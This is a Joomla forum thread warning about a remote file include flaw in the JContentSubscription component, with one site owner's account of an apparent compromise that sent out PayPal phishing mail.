Joomla! Discussion Forums

JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

Component    : com_jcs version 1.5.8 - payable component

Available from joomlaequipment.com (problem loading page)

Just posted on milw0rm http://www.milw0rm.com/exploits/4508

It may be all versions prior to 1.5.9 because I was affected on a 1.5.7 install.

Hmmm... yup -  got a call from my webhosts [small UK company] who were very nice but told me to "fix the holes in your scripts"... apparently someone noticed a surge in outgoing mail use which turned out to be someone trying on that old chestnut of:

"click here to fill in your paypal details... " [yes and the pass please!] - I presume it was this -  I didn't get much of a run down - something to do with a paypal exploit anyway, maybe linked to the JContentSubs paypal component??

..all going to Australian email addresses apparently and 1000s of them went in the 6 or so hours before some alert techie spotted the spike.

Thing is whatever they did has crashed my site... spent 8 hours getting it working again today.

I noticed some web traffic arriving not at the site pages but the web stats showed a glut of hits to one of the [many] components/bots script addresses. I think in hindsight this was a scan for the JContentSub vunerability -  shame I did not shut the thing down when I saw these attempts... ho-hum.

Beware... I'm skipping the whole thing till it's been well beta'd -  which it obviously wasn't [and they charge!!]